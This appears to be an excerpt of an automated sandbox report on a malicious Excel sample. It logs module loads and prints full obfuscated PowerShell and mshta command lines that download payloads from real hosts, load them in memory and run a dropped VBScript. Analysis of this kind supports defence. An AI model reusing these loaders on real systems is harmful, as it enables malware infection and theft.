                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: dwmapi.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: nlaapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                    Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                    Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr | Initial sample: OLE zip file path = xl/calcChain.xml
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr | Initial sample: OLE zip file path = docProps/thumbnail.wmf
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                    Source: pi-77159.xls | Static file information: File size 1136640 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.pdb | source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.pdbhP | source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.pdb | source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.pdbhP | source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr | Initial sample: OLE indicators vbamacros = False
                    Source: pi-77159.xls | Initial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
